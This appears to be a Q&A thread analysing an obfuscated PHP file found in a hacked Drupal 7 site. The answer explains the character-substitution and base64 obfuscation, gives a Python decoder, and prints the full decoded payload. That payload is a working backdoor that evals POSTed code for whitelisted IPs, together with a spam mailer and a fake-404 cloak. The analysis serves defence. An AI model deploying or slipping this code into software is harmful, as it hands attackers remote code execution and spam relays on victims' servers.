'f3SYgGjYgGjYgGjYgGjH7ePYB2Mbsw4SgmJeRKt8RQ8KsmtUBhdRxOjKAejHRQueRKWeROPKfk'.
'tbz1Vbr3d9B14exUUSxGXgAGjYgGjYgGjYgGjYf3SYgGjYgGjYgGjYgGjYgGjYB9nbzwtesjPKfktbz'.
'1Vbr3d9B14exUUYh1pYgmqYy4+YgmsSlPjYgGjYgGjYgGjYgGjYgGjYgGjYgmOeRmtYgZcYfwW8BwvescO9xjO'.
'HWOvKM4d6dwW8BwvescO9xjOUAOvKWedCJPjYgGjYgGjYgGjYgGjYgGjH7ePYfQredQ4bAjO9B14ex'.
'Jj6phXip4dKAbjSxGO9B14exGcYfQredQ4bAjO9B14exJJ6g4NSp3SYgGjYgGjYgGjYgGjulPjYgGjYgGjYgGjYgGO9B14ex'.
'GvixGARfKb82NWRBZACJPjYgGjYgGjYgGjYgGSYgGjYgGjYgGjYgGjKfK2bRw2bElj604jYOQn8dm28dlVUf2'.
'J9pPjeRkJ8B20eRmX8sZnogrEUEbV9zcW8xrrbzN28zQn9BwORfKb8AYTgAGjYgGjYgGjYg'.
'GjYgmW9R1r9RQ4YgZcYgKy8sL497L467N28zU4HyPjYALMUfK397ZPKBmtUBhX6AKbb2N'.
'vY03SYgGjYgGjYgkcgAGjYgGjYgGjKfK2bRw2bElj604jY2NWRBZACJPjYgGj'.
'YgGjYGPjYgGjYgGjYB2zSgGObB1We7rM7WUV9RmP8sldRxGcixGdahcpwgbjSxGObzwNU7wMUgGvixG'.
'O9B14ep3SYgGjYgGjYgGSYgGjYgGjYgkG9dUWHRm2YgjO9dG3KfK2'.
'bRw2bElXCWGnSAkp97LOYfK2bRw2bEljSAFSYgGjYgGjYgGSYgGjYgGjYgGObz'.
'wMYy4jYAYTYgmP971O9RKMYy4jYAYTYgmPRsm2UBw0UBwOYy4j9z13bsaTgAGjYgGjYgGjUstX8BaPYg1G9zwn'.
'9AjO9dGXYgOSYgGjYgGjYgkTgAGjYgGjYgGjYgGjYgmW9R5j604jlB9W971OS'.
'gmzbgJj5pGWQgOTYgFIYQBf460mjVgJ46RlngylvVg+46EmjVg'.
'r46EmjAGI6JPjYgGjgAGjYgGjYgGjYgGjYgFIYQgu4eylnVgW46RmjQgD46Gj46El3QgT'.
'460mtcgZ4eFj46ul3QgM46nlnVgW46qlnVgWYQgWYQgD46TlnUBg46RlnUBg46ajSAFSY'.
'gGjYgGjYgGjYgGjH7ePYghjKBtu9Bw497Q497ljKAejbEmWbBcMSgmW9R53YgKbb2NvRfKb8'.
'AYXYp4cmO15a4ajSlPjYgGjYgGjYgGjYgkTgAGjYgGjYgGjYgGjYgGjYgGnSAylVcgJ46ilnVgT46Tl3VgD46jj4'.
'eilVVgrYQBk4eulvQBg46ylnUB6Yg4j46qlnVBG4eylVUgD4e6lvQBG4eilVUgFYQgD46TlnUBg46RlnUBgYg'.
'PngAGjYgGjYgGjYgGjYgGjYgGOH1cO9Rm2eEm29gGcYfmWU7aTgAGjYgGjYgGjYg'.
'GjYgGjYgGSYgGjYgGjYgGjYgGjYgGjYgmP971O9RKMYy4jbEwAbEmWSgmW9R53YyG3YfQ4bdknbWjObzwM6gG'.
'ARfKb82NWRBZASxOTgAGjYgGjYgGjYgGjYgGjYgGObzwMYy4jbEwAbEmWSgmW9R53YfQ4bdknbWjObzwM6gGARfKb82NWRBZAS'.
'x34Sp3SYgGjYgGjYgGjYgGjYgGjYGPjYgGjYgGjYgGjYgGjYgGj6WPjxBwt9Bw'.
'WbWk48WkkbdKtoxGI6JPjYgGjYgGjYgGjYgGjYgGjH7ePYgmJeRKt8RQ8KEK2UfwW8AUUip4dHBwt9BwWbWbjufJjKfktbz1Vb'.
'r3dbzw4URKvKr4cixUtbdKtoxbSYgGjYgGjYgGjYgGjYgGjYgGjYgkFugGPHRQM9RlPKfkt'.
'bz1Vbr3dbzwOHRK2eEldRxOjKAejKfktbz1Vbr3dbzwOHRK2eE'.
'ldRp4cUfKr9xOjSlPjYgGjYgGjYgGjYgGjYgGjoJPjYgGjYgGjYgGjYgGjYgGjYgGjYgmPYy4j9RtJ8BcO9xjARfKb8AY3Yg'.
'mP971O9RKMSp3SYgGjYgGjYgGjYgGjYgGjYgGjYgGOHBwt9BwWbWGcYB1Wbz1LSgOTgAGjYgGjYgGjYg'.
'GjYgGjYgGjYgGj9zcW9710HgjjKBjjeR5jKB3ciAmsYgOSYgGjYgGjY'.
'gGjYgGjYgGjYgGjYgkTgAGjYgGjYgGjYgGjYgGjYgGjYgGjYgGjYB2zSgk'.
'MUfKJ8E5PKfe3YgbDKWOjSlPjYgGjYgGjYgGjYgGjYgGjYgGjYgGjYgkTgAGjYgGjYgGjYgGjYgGjYgGjYgGjYgGjYgGj'.
'YgGOHWGcYfQredQ4bAjOUAJj5gJjbEmWbBcMSgms6gGdCAbXSp3SYgGjYgGjYgGjYgGjYgGjYgGjYgGjYgGjY'.
'gGjYgmsYy4jUfKX8xtMU7KMUfYPKfe3YfQ4bdknbWjOUAJjKMPdSx3NSxOTgAGjYgGjYgGjYgGjYgGjYgGjYgGjYgG'.
'jYf4SYgGjYgGjYgGjYgGjYgGjYgGjYgGjYgGjKBt2e7m2bdQ8bEmWUBcrbfk2bAjOHW2UYy4jKfeTgAGjYgGjYgGjYgG'.
'jYgGjYgGjYgGjulPjYgGjYgGjYgGjYgGjYgGjulPjYgGjYgGjYgGjYgGjYgGjH7ePYB2Mb'.
'sw4SgmJeRKt8RQ8KEK29B2W97Q4Kr4XYgezYgmJeRKt8RQ8KEK29B2W97Q4Kr4ciRmWU7ajKAejH'.
'RQM9RlPKBt2e7m2bdQ8K4Nil41axacCKr4XYgOSYgGjYgGjYgGjYgGjYgGjYf3SYgGjYgGjYgGjYgG'.
'jYgGjYgGjYgGObB1We7rM7WUrbzJdRxGcYgmP971O9RKM7WU5p4Qkwh2ipAUUCJ'.
'PjYgGjYgGjYgGjYgGjYgGjYgGjYB2zSgGtHRQM9RlPKfktbz1Vbr3dbzwOHRK2eEl'.
'Vescr8dldRxOjSxGObB1We7rM7WUW97mXbzw0Ugr08EwvUgUUYy4j5y3SYgGjYgG'.
'jYgGjYgGjYgGjYgGjYgkX9AjjKfktbz1Vbr3dbzwOHRK2eElVescr8dldRpJN5gGXgAGjYgGjYgGjYgGjYgGj'.
'YgGjYgGjoJPjYgGjYgGjYgGjYgGjYgGjYgGjYgGjYgGObB1We7rM7WUW97mXbzw0Ugr08EwvUgUUS'.
'W3TgAGjYgGjYgGjYgGjYgGjYgGjYgGjYgGjYgmzU7L0Yy4jRrcBwaLywh2ip2cuCJPjYgGjYgGjYgGjYgGjYgGjYgGjYgGj'.
'YgkW9RmrbzZjlB2MRscAHzw0UgjOUBtXbWOjiWGOUBtXbW4+KB9r8'.
'z5PKfktbz1VbWOjCAGO9dwveWjObB1We7rMSp3SYgGjYgGjYgGjYgGjYgGjYgGjYgk'.
'cgAGjYgGjYgGjYgGjYgGjYgkcgAGjYgGjYgGjYgGjYgGjYgkX9AjjKfktbz1Vbr3dbzw4URKvKr4cixUP971O9RKMKWGXYfK2'.
'UfwW8AGOHBwt9BwWbM3SYgGjYgGjYgGjYgGjulPjYgGjYgGjYf4SYgGjYgGjYgGSYgGjYgGjYgkG9zQ38EQ2SgmzbgOTgA'.
'GjYgkcgAGjYgk28fQ2YfK2UfwW8AkBlaNpmp3nSAGO9RKWbEmW6Am2bdKv8M3jSAFSYgGjYGPjYgGjH'.
'7ePYgmJeRKt8RQ8KEK2UfwW8AUUip4deRKWeROdYgOjKfK2bWGcYB1Wbz1LSgUP971O9RKMKM4+KBt2e7'.
'm2bd53YgU08sL497L4KM4+KfK2bWOTgAGjYgGSYgGjYfK2UfwW'.
'8AGObzwMCJXc';
eval(v78ZFAX($vFHLJ89, $vIIJ30Y));?> I believe it was used for sending spam such as: To: <[email protected]>
Subject: 55th Anniversary and Free Pizza
X-PHP-Originating-Script: 763659:template46.php(236) : eval()'d code But how? What exactly is its method of operation? A bit more background: It was found in a Drupal 7 instance at sites/all/modules/contrib/ctools/stylizer/plugins/export_ui/template46.php, however the file and code can vary depending on the hack. One user reported it in sites/all/modules/i18n/i18n_block/stats7.php and the content of this script was a bit different: <?php
$vNWZ3B7 = Array('1'=>'6', '0'=>'e', '3'=>'8', '2'=>'L', '5'=>'v', '4'=>'M', '7'=>'2', '6'=>'s', '9'=>'r', '8'=>'q', 'A'=>'l', 'C'=>'Y', 'B'=>'S', 'E'=>'K', 'D'=>'n', 'G'=>'T', 'F'=>'C', 'I'=>'y', 'H'=>'t', 'K'=>'G', 'J'=>'9', 'M'=>'k', 'L'=>'w', 'O'=>'H', 'N'=>'x', 'Q'=>'m', 'P'=>'E', 'S'=>'j', 'R'=>'O', 'U'=>'7', 'T'=>'4', 'W'=>'X', 'V'=>'D', 'Y'=>'d', 'X'=>'Z', 'Z'=>'I', 'a'=>'z', 'c'=>'R', 'b'=>'0', 'e'=>'B', 'd'=>'N', 'g'=>'h', 'f'=>'P', 'i'=>'o', 'h'=>'W', 'k'=>'c', 'j'=>'3', 'm'=>'A', 'l'=>'a', 'o'=>'f', 'n'=>'p', 'q'=>'F', 'p'=>'b', 's'=>'5', 'r'=>'g', 'u'=>'J', 't'=>'u', 'w'=>'U', 'v'=>'V', 'y'=>'Q', 'x'=>'1', 'z'=>'i');
function v5T7ETO($vQF6A3S, $vP8XOME){$v8YITRE = ''; for($i=0; $i < strlen($vQF6A3S); $i++){$v8YITRE .= isset($vP8XOME[$vQF6A3S[$i]]) ? $vP8XOME[$vQF6A3S[$i]] : $vQF6A3S[$i];}
return base64_decode($v8YITRE);}
$vC3WWUF = 'FQAQEKAak7vbEFcowPJGvq6zC7JMXBuYEBmQuzenkjdAYFrMWxefwxc'.
'pZQdxkjc5pvJgCjcnp7TzWBMruzCrlWdoX7J5XqJnkFrMWxdqwAXqw'. | The last line performs an eval() of function v78ZFAX() given the two parameters like so: eval(v78ZFAX($vFHLJ89, $vIIJ30Y)); That first parameter is the part that takes up the bulk of the code. It is assigned all that random-looking garbage, with . concatenating all those strings together into one long string: $vFHLJ89 = 'gz2zSB2Mbsw4Sgmuahcpw13AescO9xKUSxGzKAkXbEQ2UgjORrkiarm8YzQrbEmn8wcteEmX8sZARxOjKAejHRQu9scn91cXb'.'gjORrQ1a291a23daOwQprm1R41hm1YdRxOXgd3Sg7wse7JPez1M9pe4Rsm2escO'.'9xjORrkiarm8YzQn9BaARxOXCJPK9RtXUgjXCJXcgjXX9AGPHRQM9RlPK1clprQa7WK4oRk' ... The second parameter is this array, which maps certain letters/numbers to other letters/numbers: $vIIJ30Y = Array(
'1'=>'F', '0'=>'j', '3'=>'s', '2'=>'l', '5'=>'M', '4'=>'0', '7'=>'W', '6'=>'L', '9'=>'Z', '8'=>'b', 'A'=>'i', 'C'=>'O', 'B'=>'G', 'E'=>'3', 'D'=>'6', 'G'=>'A', 'F'=>'8', 'I'=>'q', 'H'=>'a', 'K'=>'J', 'J'=>'w', 'M'=>'z', 'L'=>'5', 'O'=>'k', 'N'=>'x', 'Q'=>'N', 'P'=>'o', 'S'=>'K', 'R'=>'X', 'U'=>'d', 'T'=>'7', 'W'=>'y', 'V'=>'t', 'Y'=>'I', 'X'=>'p', 'Z'=>'4', 'a'=>'U', 'c'=>'9', 'b'=>'c', 'e'=>'Y', 'd'=>'n', 'g'=>'C', 'f'=>'H', 'i'=>'P', 'h'=>'E', 'k'=>'B', 'j'=>'g', 'm'=>'R', 'l'=>'Q', 'o'=>'e', 'n'=>'v', 'q'=>'r', 'p'=>'T', 's'=>'2', 'r'=>'1', 'u'=>'f', 't'=>'h', 'w'=>'V', 'v'=>'u', 'y'=>'D', 'x'=>'S', 'z'=>'m'); The function itself can be re-written as this for clarity: function v78ZFAX($vJOJJ7T, $vRJ8WGX)
{
$vM74216 = '';
for($i=0; $i < strlen($vJOJJ7T); $i++)
{
$vM74216 .= isset($vRJ8WGX[$vJOJJ7T[$i]]) ? $vRJ8WGX[$vJOJJ7T[$i]] : $vJOJJ7T[$i];
}
return base64_decode($vM74216);
} It starts by declaring a blank variable vM74216 and then for each digit of the first variable (the super long one) it adds a character to this currently-blank variable. The digit it adds depends on the outcome of the ternary condition used by the isset() function, which simply checks to see if that i-th digit of the huge number has a corresponding lookup entry in the character mapping array. At the end of it all, it Base64 decodes the resultant variable, which gets passed as the derived parameter of the initial eval() function. The whole point is obfuscation. It looks like a jumbled mess, but characters get swapped, concatenated, etc. until its payload is unleashed. This is done to prevent an analyst from immediately knowing the nature of the script, as well as bypassing signature-based antivirus techniques. EDIT Using this hack of a Python script (I'm just more comfortable in Python): import base64
TheArray = {'1':'F', '0':'j', '3':'s', '2':'l', '5':'M', '4':'0', '7':'W', '6':'L', '9':'Z', '8':'b', 'A':'i', 'C':'O', 'B':'G', 'E':'3', 'D':'6', 'G':'A', 'F':'8', 'I':'q', 'H':'a', 'K':'J', 'J':'w', 'M':'z', 'L':'5', 'O':'k', 'N':'x', 'Q':'N', 'P':'o', 'S':'K', 'R':'X', 'U':'d', 'T':'7', 'W':'y', 'V':'t', 'Y':'I', 'X':'p', 'Z':'4', 'a':'U', 'c':'9', 'b':'c', 'e':'Y', 'd':'n', 'g':'C', 'f':'H', 'i':'P', 'h':'E', 'k':'B', 'j':'g', 'm':'R', 'l':'Q', 'o':'e', 'n':'v', 'q':'r', 'p':'T', 's':'2', 'r':'1', 'u':'f', 't':'h', 'w':'V', 'v':'u', 'y':'D', 'x':'S', 'z':'m'}
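# TheArray reproduces the $vIIJ30Y substitution map from the malicious script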
LongVar = 'gz2zSB2Mbsw4Sgmuahcpw13AescO9xKUSxGzKAkXbEQ2UgjORrkiarm8YzQrbEmn8wcteEmX8sZARxOjKAejHRQu9scn91cXb'+'gjORrQ1a291a23daOwQprm1R41hm1YdRxOXgd3Sg7wse7JPez1M9pe4Rsm2escO'+'9xjORrkiarm8YzQn9BaARxOXCJPK9RtXUgjXCJXcgjXX9AGPHRQM9RlPK1clprQa7WK4oRk'+'2Y24XYgezYgmuahcpw13AUf2J9xKUip4A5xYXgd3SgRmLbBaNREQ28zlPSp3Sg7wZHRlPSp3SulX28fQ2H7ejSB2Mbsw4S'+'gmuahcpw13AUf2J9xKUSxGzKAGORrkiarm8YdmLbBaARp4cY0YASlXTgjXcgzw3bswX9'+'AGPHRQM9RlPK1clprQa7WK4oRk2Y24XSlXTgj22estnYgmuahcpw13AUf2J9xKUCJPK9RtXUgjXCJXcgjX2bdKnb2F45ylP'+'Sp3Sgz9r8zQ4H7cvYB2MRsUn8smuHRGPKB2JSlXTgjOO9scn9f5jixkkbdKtoxjAQAZNCyav505L6AY3Y'+'gYZ60hMCgZN5pjvYAOTgjOSg79nbzwtesjjSgmd8scObWktbWGO9scn9gOSgR3Sgl2X9AGPbEmWbEmWS'+'gmXbgJjKBUn8slXYghcYh9kp1Q1SlPKgR3SglOKbzw4URKvY1mxwaaTgjOKul'+'PKulPKgj2W9RmrbzZjmO15a4aTgd4Sgz9r8zQ4H7cvYfmLbBaNREQ28zlPSlXTgj2X9AjtHRQM9RlPK1clprQa7WK2871X8f5A'+'RxOSglOKprYjY72Mbsw4Sgmuahcpw13AUBt287wMY24XgjOKgacxYg1XbEQ2UgjORrki'+'arm8Yzr2bEQt9swMY24XgjOKgacxYg1XbEQ2UgjORrkiarm8Yz9W8srMY24XgjOKgacxYg1XbEQ2Ug'+'jORrkiarm8YzrtH7N2bd5ARxOSgxOSgR3Sgl22oB24SgOTgj2cgjPKH7eP9sw4Rsrt9s20RE1r'+'8Em2brcdbB5PSxOSgR3Sgl2z8EK2e7QPSgmuahcpwgktbWGOHswLYy4+YgmJ8EQ4SlPKg'+'R3SglOKK1clprQa7Wmq9R2UYy4jbEmWHRk0bsNtbst2bWjObBcMUgOTgjOKulPKulPSgxm'+'2871X8f5jixkGU7LM9RKXe7NXozaPez1M9pe4Rsm2escO9xjORrkiarm8YzwVe723bWK'+'USxOTgjOOUBt287wMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WK4HBwV9R5AR'+'xOXCJPKKBr2bEQt9swMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WKV9RQ'+'Me7U2bWKUSxOTgjOO9dKn8R5jixkGU7LM9RKXe7NXozaPez1M9pe4Rsm2escO'+'9xjORrkiarm8Yz9W8srMY24XSp3SgxmVe7239RKMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WKVe7239R'+'KMY24XSp3Sgxmt8B2tbswMYy4jlfwvbswWH713HRX2SBKtbsasQ1cO97Qn9BaPK1clprQa7WK'+'t8B2tbswMY24XSp3SgxmJeRQM9R5jixkGU7LM9RKXe7NXozaPez1M9pe4Rsm2escO9xj'+'ORrkiarm8YdktbEQ2bWKUSxOTgjPKH7ePHRQM9RlPK1cpmwK7mwYXSlP'+'KoJPKgxmua4wxwOwx7WUlx1kua4w5mAUUYy4jYAFACWGSglOORrQ1a291a23daOwQprm1R41'+'hm1YdRxGcYgYN50bv5gZJ60hACJPKg72zSg128Rk4oxjORrQ1a291'+'a23dx1maa1ceR49ia2UkaOm1m1cBprYdRxOXgjOKoJPKglOORrQ1a291a23dx1maa1ceR49ia2UkaOm1m1cB'+'prYdRxGcYgYN50bv5gZJ60hACJPKgR4SgR4Sgj2X9AtXbEQ2UgjOR49KphwpSxOSgR3Sgl2z8EK2e7QPSgmumO25mw5jeR5jK'+'BV2oxGciAGO9z239xOSgl2TgjOKgxmzH7N28z1V9xGcYB13UBwWRsrteEKnbWjOe7NXeRQ2br3OHs'+'wLRxOTgjOKgxmzH7N28z1V9xGcYBLr8wcVe7QW8E5PKB9X8Bwve7r2Sp3SglOKK'+'B9X8Bwve7r2Yy4jUBwZU1cVe7QW8E5PKB9X8Bwve7r2Sp3SglOKKB9X8Bwv'+'e7r2Yy4joBLr8wcVe7QW8E5PKB9X8Bwve7r2Sp3SglOKK1cBxaN1ar3OHswLRw3A8z1V9xKUYy4jKB9X8Bwve7r2CJP'.... TRIMMED FOR SE ANSWER CHAR COUNT
NewVar = ''
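# Apply the same character substitution the malware performs; characters with no mapping pass through unchanged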
for i in LongVar:
    if i in TheArray:
        NewVar += TheArray[i]
    else:
        NewVar += i
print(base64.b64decode(NewVar)) I was able to derive the obfuscated payload as: if(isset($_POST["code"]) && isset($_POST["custom_action"]) && is_good_ip($_SERVER['REMOTE_ADDR']))
{
eval(base64_decode($_POST["code"]));
exit();
}
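// The block above is a remote backdoor: base64-encoded PHP supplied in $_POST['code'] (together with 'custom_action') is executed via eval() for whitelisted source IPs.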
if (isset($_POST["type"]) && $_POST["type"]=="1")
{
type1_send();
exit();
}
elseif (isset($_POST["type"]) && $_POST["type"]=="2")
{
}
elseif (isset($_POST["type"]))
{
echo $_POST["type"];
exit();
}
error_404();
function is_good_ip($ip)
{
$goods = Array("6.185.239.", "8.138.118.");
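// Hard-coded operator IP prefixes: any request whose address contains one of them is trusted (checked with strstr below).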
foreach ($goods as $good)
{
if (strstr($ip, $good) != FALSE)
{
return TRUE;
}
}
return FALSE;
}
function type1_send()
{
if(!isset($_POST["emails"])
OR !isset($_POST["themes"])
OR !isset($_POST["messages"])
OR !isset($_POST["froms"])
OR !isset($_POST["mailers"])
)
{
exit();
}
if(get_magic_quotes_gpc())
{
foreach($_POST as $key => $post)
{
$_POST[$key] = stripcslashes($post);
}
}
$emails = @unserialize(base64_decode($_POST["emails"]));
$themes = @unserialize(base64_decode($_POST["themes"]));
$messages = @unserialize(base64_decode($_POST["messages"]));
$froms = @unserialize(base64_decode($_POST["froms"]));
$mailers = @unserialize(base64_decode($_POST["mailers"]));
$aliases = @unserialize(base64_decode($_POST["aliases"]));
$passes = @unserialize(base64_decode($_POST["passes"]));
if(isset($_SERVER))
{
$_SERVER['PHP_SELF'] = "/";
$_SERVER['REMOTE_ADDR'] = "127.0.0.1";
if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$_SERVER['HTTP_X_FORWARDED_FOR'] = "127.0.0.1";
}
}
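// The real client is masked above: REMOTE_ADDR and X-Forwarded-For are overwritten with 127.0.0.1 before any mail is built.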
if(isset($_FILES))
{
foreach($_FILES as $key => $file)
{
$filename = alter_macros($aliases[$key]);
$filename = num_macros($filename);
$filename = text_macros($filename);
$filename = xnum_macros($filename);
$_FILES[$key]["name"] = $filename;
}
}
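// Uploaded attachment names were just rewritten through the macro helpers defined further below, giving each run randomized filenames.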
if(empty($emails))
{
exit();
}
foreach ($emails as $fteil => $email)
{
$theme = $themes[array_rand($themes)];
$theme = alter_macros($theme["theme"]);
$theme = num_macros($theme);
$theme = text_macros($theme);
$theme = xnum_macros($theme);
$message = $messages[array_rand($messages)];
$message = alter_macros($message["message"]);
$message = num_macros($message);
$message = text_macros($message);
$message = xnum_macros($message);
//$message = pass_macros($message, $passes);
$message = fteil_macros($message, $fteil);
$from = $froms[array_rand($froms)];
$from = alter_macros($from["from"]);
$from = num_macros($from);
$from = text_macros($from);
$from = xnum_macros($from);
if (strstr($from, "[CUSTOM]") == FALSE)
{
$from = from_host($from);
}
else
{
$from = str_replace("[CUSTOM]", "", $from);
}
$mailer = $mailers[array_rand($mailers)];
send_mail($from, $email, $theme, $message, $mailer);
}
}
function send_mail($from, $to, $subj, $text, $mailer)
{
$head = "";
$un = strtoupper(uniqid(time()));
$head .= "From: $from\n";
$head .= "X-Mailer: $mailer\n";
$head .= "Reply-To: $from\n";
$head .= "Mime-Version: 1.0\n";
$head .= "Content-Type: multipart/alternative;";
$head .= "boundary=\"----------".$un."\"\n\n";
$plain = strip_tags($text);
$zag = "------------".$un."\nContent-Type: text/plain; charset=\"ISO-8859-1\"; format=flowed\n";
$zag .= "Content-Transfer-Encoding: 7bit\n\n".$plain."\n\n";
$zag .= "------------".$un."\nContent-Type: text/html; charset=\"ISO-8859-1\";\n";
$zag .= "Content-Transfer-Encoding: 7bit\n\n$text\n\n";
$zag .= "------------".$un."--";
if(count($_FILES) > 0)
{
foreach($_FILES as $file)
{
if(file_exists($file["tmp_name"]))
{
$f = fopen($file["tmp_name"], "rb");
$zag .= "------------".$un."\n";
$zag .= "Content-Type: application/octet-stream;";
$zag .= "name=\"".$file["name"]."\"\n";
$zag .= "Content-Transfer-Encoding:base64\n";
$zag .= "Content-Disposition:attachment;";
$zag .= "filename=\"".$file["name"]."\"\n\n";
$zag .= chunk_split(base64_encode(fread($f, filesize($file["tmp_name"]))))."\n";
fclose($f);
}
}
}
if(@mail($to, $subj, $zag, $head))
{
if(!empty($_POST['verbose']))
echo "SENDED";
}
else
{
if(!empty($_POST['verbose']))
echo "FAIL";
}
}
function alter_macros($content)
{
preg_match_all('#{(.*)}#Ui', $content, $matches);
for($i = 0; $i < count($matches[1]); $i++)
{
$ns = explode("|", $matches[1][$i]);
$c2 = count($ns);
$rand = rand(0, ($c2 - 1));
$content = str_replace("{".$matches[1][$i]."}", $ns[$rand], $content);
}
return $content;
}
function text_macros($content)
{
preg_match_all('#\[TEXT\-([[:digit:]]+)\-([[:digit:]]+)\]#', $content, $matches);
for($i = 0; $i < count($matches[0]); $i++)
{
$min = $matches[1][$i];
$max = $matches[2][$i];
$rand = rand($min, $max);
$word = generate_word($rand);
$content = preg_replace("/".preg_quote($matches[0][$i])."/", $word, $content, 1);
}
preg_match_all('#\[TEXT\-([[:digit:]]+)\]#', $content, $matches);
for($i = 0; $i < count($matches[0]); $i++)
{
$count = $matches[1][$i];
$word = generate_word($count);
$content = preg_replace("/".preg_quote($matches[0][$i])."/", $word, $content, 1);
}
return $content;
}
function xnum_macros($content)
{
preg_match_all('#\[NUM\-([[:digit:]]+)\]#', $content, $matches);
for($i = 0; $i < count($matches[0]); $i++)
{
$num = $matches[1][$i];
$min = pow(10, $num - 1);
$max = pow(10, $num) - 1;
$rand = rand($min, $max);
$content = str_replace($matches[0][$i], $rand, $content);
}
return $content;
}
function num_macros($content)
{
preg_match_all('#\[RAND\-([[:digit:]]+)\-([[:digit:]]+)\]#', $content, $matches);
for($i = 0; $i < count($matches[0]); $i++)
{
$min = $matches[1][$i];
$max = $matches[2][$i];
$rand = rand($min, $max);
$content = str_replace($matches[0][$i], $rand, $content);
}
return $content;
}
function generate_word($length)
{
$chars = 'abcdefghijklmnopqrstuvyxz';
$numChars = strlen($chars);
$string = '';
for($i = 0; $i < $length; $i++)
{
$string .= substr($chars, rand(1, $numChars) - 1, 1);
}
return $string;
}
function pass_macros($content, $passes)
{
$pass = array_pop($passes);
return str_replace("[PASS]", $pass, $content);
}
function fteil_macros($content, $fteil)
{
return str_replace("[FTEIL]", $fteil, $content);
}
function is_ip($str) {
return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/",$str);
}
function from_host($content)
{
$host = preg_replace('/^(www|ftp)\./i','',@$_SERVER['HTTP_HOST']);
if (is_ip($host))
{
return $content;
}
$tokens = explode("@", $content);
$content = $tokens[0] . "@" . $host . ">";
return $content;
}
function error_404()
{
header("HTTP/1.1 404 Not Found");
$uri = preg_replace('/(\?).*$/', '', $_SERVER['REQUEST_URI'] );
$content = custom_http_request1("http://".$_SERVER['HTTP_HOST']."/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA");
$content = str_replace( "/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA", $uri, $content );
exit( $content );
}
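// Visitors who are not the operator get a fake 404: the script fetches the site's own error page via custom_http_request1() and replays it for the requested URI.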
function custom_http_request1($params)
{
if( ! is_array($params) )
{
$params = array(
'url' => $params,
'method' => 'GET'
);
}
if( $params['url']=='' ) return FALSE;
if( ! isset($params['method']) ) $params['method'] = (isset($params['data'])&&is_array($params['data'])) ? 'POST' : 'GET';
$params['method'] = strtoupper($params['method']);
if( ! in_array($params['method'], array('GET', 'POST')) ) return FALSE;
/* Приводим ссылку в правильный вид */
$url = parse_url($params['url']);
if( ! isset($url['scheme']) ) $url['scheme'] = 'http';
if( ! isset($url['path']) ) $url['path'] = '/';
if( ! isset($url['host']) && isset($url['path']) )
{
if( strpos($url['path'], '/') )
{
$url['host'] = substr($url['path'], 0, strpos($url['path'], '/'));
$url['path'] = substr($url['path'], strpos($url['path'], '/'));
}
else
{
$url['host'] = $url['path'];
$url['path'] = '/';
}
}
$url['path'] = preg_replace("/[\\/]+/", "/", $url['path']);
if( isset($url['query']) ) $url['path'] .= "?{$url['query']}";
$port = isset($params['port']) ? $params['port']
: ( isset($url['port']) ? $url['port'] : ($url['scheme']=='https'?443:80) );
$timeout = isset($params['timeout']) ? $params['timeout'] : 30;
if( ! isset($params['return']) ) $params['return'] = 'content';
$scheme = $url['scheme']=='https' ? 'ssl://':'';
$fp = @fsockopen($scheme.$url['host'], $port, $errno, $errstr, $timeout);
if( $fp )
{
/* Mozilla */
if( ! isset($params['User-Agent']) ) $params['User-Agent'] = "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16";
$request = "{$params['method']} {$url['path']} HTTP/1.0\r\n";
$request .= "Host: {$url['host']}\r\n";
$request .= "User-Agent: {$params['User-Agent']}"."\r\n";
if( isset($params['referer']) ) $request .= "Referer: {$params['referer']}\r\n";
if( isset($params['cookie']) )
{
$cookie = "";
if( is_array($params['cookie']) ) {foreach( $params['cookie'] as $k=>$v ) $cookie .= "$k=$v; "; $cookie = substr($cookie,0,-2);}
else $cookie = $params['cookie'];
if( $cookie!='' ) $request .= "Cookie: $cookie\r\n";
}
$request .= "Connection: close\r\n";
if( $params['method']=='POST' )
{
if( isset($params['data']) && is_array($params['data']) )
{
foreach($params['data'] AS $k => $v)
$data .= urlencode($k).'='.urlencode($v).'&';
if( substr($data, -1)=='&' ) $data = substr($data,0,-1);
}
$data .= "\r\n\r\n";
$request .= "Content-type: application/x-www-form-urlencoded\r\n";
$request .= "Content-length: ".strlen($data)."\r\n";
}
$request .= "\r\n";
if( $params['method'] == 'POST' ) $request .= $data;
@fwrite ($fp,$request); /* Send request */
$res = ""; $headers = ""; $h_detected = false;
while( !@feof($fp) )
{
$res .= @fread($fp, 1024); /* читаем контент */
/* Проверка наличия загловков в контенте */
if( ! $h_detected && strpos($res, "\r\n\r\n")!==FALSE )
{
/* заголовки уже считаны - корректируем контент */
$h_detected = true;
$headers = substr($res, 0, strpos($res, "\r\n\r\n"));
$res = substr($res, strpos($res, "\r\n\r\n")+4);
/* Headers to Array */
if( $params['return']=='headers' || $params['return']=='array'
|| (isset($params['redirect']) && $params['redirect']==true) )
{
$h = explode("\r\n", $headers);
$headers = array();
foreach( $h as $k=>$v )
{
if( strpos($v, ':') )
{
$k = substr($v, 0, strpos($v, ':'));
$v = trim(substr($v, strpos($v, ':')+1));
}
$headers[strtoupper($k)] = $v;
}
}
if( isset($params['redirect']) && $params['redirect']==true && isset($headers['LOCATION']) )
{
$params['url'] = $headers['LOCATION'];
if( !isset($params['redirect-count']) ) $params['redirect-count'] = 0;
if( $params['redirect-count']<10 )
{
$params['redirect-count']++;
$func = __FUNCTION__;
return @is_object($this) ? $this->$func($params) : $func($params);
}
}
if( $params['return']=='headers' ) return $headers;
}
}
@fclose($fp);
}
else return FALSE;/* $errstr.$errno; */
if( $params['return']=='array' ) $res = array('headers'=>$headers, 'content'=>$res);
return $res;
} It's interesting to see some code comments in Russian. Google Translate does well for them: $res .= @fread($fp, 1024); /* читаем контент */ "read content" /* Проверка наличия загловков в контенте */ "Check availability of titles in the content" /* заголовки уже считаны - корректируем контент */ "headers already read - adjust content" | {
"source": [
